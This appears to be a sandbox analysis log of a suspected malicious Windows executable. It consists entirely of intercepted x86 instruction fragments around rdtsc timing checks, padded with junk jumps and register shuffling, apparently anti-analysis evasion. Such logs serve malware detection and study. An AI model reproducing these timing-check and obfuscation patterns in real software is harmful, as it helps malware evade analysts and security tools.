                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470340 second address: 54703D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B333h 0x00000009 xor esi, 0917365Eh 0x0000000f jmp 00007FA934C8B339h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA934C8B32Fh 0x00000027 jmp 00007FA934C8B333h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FA934C8B338h 0x00000033 add eax, 5EE55BE8h 0x00000039 jmp 00007FA934C8B32Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703D3 second address: 54703D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703D9 second address: 54703DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703DD second address: 54703E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0025 second address: 54B0053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f jmp 00007FA934C8B336h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0053 second address: 54B0065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0065 second address: 54B007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA934C8B32Ah 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B007A second address: 54B00B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA9347D66C1h 0x00000009 sub eax, 0009A346h 0x0000000f jmp 00007FA9347D66C1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B00B3 second address: 54B00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, bh 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B00BA second address: 54B00CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480481 second address: 5480487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460616 second address: 546068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA9347D66C5h 0x0000000a add eax, 76D2CBC6h 0x00000010 jmp 00007FA9347D66C1h 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c call 00007FA9347D66BCh 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movzx eax, bx 0x0000002b pushfd 0x0000002c jmp 00007FA9347D66C1h 0x00000031 or ax, AE86h 0x00000036 jmp 00007FA9347D66C1h 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546068E second address: 5460694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460694 second address: 5460698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460698 second address: 546069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546069C second address: 54606AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54606AB second address: 54606AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54606AF second address: 54606B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54606B3 second address: 54606B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54606B9 second address: 54606BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54606BF second address: 54606C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54606C3 second address: 54606C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548009B second address: 54800CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 jmp 00007FA934C8B336h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480324 second address: 548032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548032A second address: 548032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548032E second address: 5480359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FA9347D66C6h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 push edx 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A06F3 second address: 54A06F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A06F9 second address: 54A06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A06FD second address: 54A0752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA934C8B339h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FA934C8B32Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA934C8B337h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0752 second address: 54A07E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e jmp 00007FA9347D66C9h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FA9347D66C1h 0x0000001a xchg eax, ecx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FA9347D66BCh 0x00000022 add ecx, 5B5ACE18h 0x00000028 jmp 00007FA9347D66BBh 0x0000002d popfd 0x0000002e pushad 0x0000002f mov al, 4Ah 0x00000031 mov bx, B906h 0x00000035 popad 0x00000036 popad 0x00000037 mov eax, dword ptr [76FB65FCh] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA9347D66BFh 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A07E2 second address: 54A07FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A07FF second address: 54A087C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f pushfd 0x00000010 jmp 00007FA9347D66C9h 0x00000015 jmp 00007FA9347D66BBh 0x0000001a popfd 0x0000001b popad 0x0000001c je 00007FA9A62697DBh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FA9347D66BBh 0x0000002b add esi, 01FD67AEh 0x00000031 jmp 00007FA9347D66C9h 0x00000036 popfd 0x00000037 mov eax, 5E6A6C37h 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A087C second address: 54A08CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA934C8B32Ch 0x00000014 sub ax, 9C58h 0x00000019 jmp 00007FA934C8B32Bh 0x0000001e popfd 0x0000001f movzx esi, bx 0x00000022 popad 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 jmp 00007FA934C8B330h 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov edi, 44E114D0h 0x00000036 push edi 0x00000037 pop ecx 0x00000038 popad 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A08CD second address: 54A0921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA9347D66BCh 0x00000013 or al, 00000048h 0x00000016 jmp 00007FA9347D66BBh 0x0000001b popfd 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 movsx edi, cx 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA9347D66C3h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0921 second address: 54A0952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [008B2014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FA9398BBC77h 0x00000024 push FFFFFFFEh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA934C8B32Dh 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0952 second address: 54A09BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 0Bh 0x00000005 pushfd 0x00000006 jmp 00007FA9347D66C8h 0x0000000b adc eax, 54852A98h 0x00000011 jmp 00007FA9347D66BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007FA9347D66C4h 0x00000021 jmp 00007FA9347D66C2h 0x00000026 popad 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a call 00007FA93940706Eh 0x0000002f mov edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FA9347D66BAh 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A09BF second address: 54A09C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A09C5 second address: 54A09CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A09CB second address: 54A09CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A09CF second address: 54A09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA9347D66C2h 0x00000010 xor al, FFFFFFB8h 0x00000013 jmp 00007FA9347D66BBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b mov edi, ecx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A09FF second address: 54A0A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FA934C8B32Ch 0x0000000c mov ah, 6Eh 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FA934C8B32Dh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov ecx, 79F09B63h 0x0000001d pushfd 0x0000001e jmp 00007FA934C8B338h 0x00000023 adc cx, 55A8h 0x00000028 jmp 00007FA934C8B32Bh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 pushad 0x00000031 push ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545011B second address: 5450140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 mov eax, ebx 0x00000008 pop edx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d pushad 0x0000000e jmp 00007FA9347D66BAh 0x00000013 popad 0x00000014 mov ebx, dword ptr [ebp+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop edx 0x0000001c mov di, cx 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450140 second address: 5450148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450148 second address: 545017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FA9347D66C0h 0x00000011 jmp 00007FA9347D66C5h 0x00000016 popfd 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545017A second address: 54501AF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA934C8B330h 0x00000008 adc ax, B888h 0x0000000d jmp 00007FA934C8B32Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov cx, 68FFh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov al, 49h 0x00000020 movsx edx, ax 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501AF second address: 54501C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66C0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501C3 second address: 5450201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FA934C8B337h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 mov edx, 4997AFB6h 0x00000017 popad 0x00000018 push esp 0x00000019 jmp 00007FA934C8B32Ah 0x0000001e mov dword ptr [esp], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450201 second address: 5450205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450205 second address: 5450222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450222 second address: 5450232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450232 second address: 5450236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450236 second address: 5450269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FA9347D66C7h 0x0000000f je 00007FA9A62B4A74h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 40F0F3D6h 0x0000001d movsx edx, si 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450269 second address: 5450281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA934C8B334h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450281 second address: 545029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545029F second address: 54502BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54502BA second address: 5450388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA9A62B4A0Ah 0x0000000f jmp 00007FA9347D66BEh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 push ecx 0x00000019 jmp 00007FA9347D66BDh 0x0000001e pop ecx 0x0000001f mov edx, 4186B6C4h 0x00000024 popad 0x00000025 or edx, dword ptr [ebp+0Ch] 0x00000028 jmp 00007FA9347D66C3h 0x0000002d test edx, 61000000h 0x00000033 jmp 00007FA9347D66C6h 0x00000038 jne 00007FA9A62B4A08h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FA9347D66BDh 0x00000047 sub ecx, 488C8C16h 0x0000004d jmp 00007FA9347D66C1h 0x00000052 popfd 0x00000053 pushfd 0x00000054 jmp 00007FA9347D66C0h 0x00000059 sbb si, 7038h 0x0000005e jmp 00007FA9347D66BBh 0x00000063 popfd 0x00000064 popad 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450388 second address: 54503BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B332h 0x00000009 xor cx, 6A98h 0x0000000e jmp 00007FA934C8B32Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test byte ptr [esi+48h], 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54503BC second address: 54503D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54407E8 second address: 544081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA934C8B338h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544081B second address: 544081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544081F second address: 5440825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440825 second address: 5440840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dx, cx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440840 second address: 5440876 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA934C8B32Ah 0x00000010 mov dx, cx 0x00000013 popad 0x00000014 mov dword ptr [esp], ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA934C8B336h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440876 second address: 544087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544087C second address: 544089B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA934C8B331h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544089B second address: 54408A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54408A1 second address: 54408C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA934C8B332h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54408C0 second address: 54408C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54408C6 second address: 54408CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54408CA second address: 54408EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA9347D66BDh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54408EF second address: 544094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B337h 0x00000009 add si, 288Eh 0x0000000e jmp 00007FA934C8B339h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub ebx, ebx 0x0000001b jmp 00007FA934C8B32Dh 0x00000020 test esi, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA934C8B32Dh 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544094E second address: 5440954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440954 second address: 544099C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9A6770D58h 0x0000000e jmp 00007FA934C8B32Fh 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007FA934C8B331h 0x00000025 jmp 00007FA934C8B32Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544099C second address: 54409A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
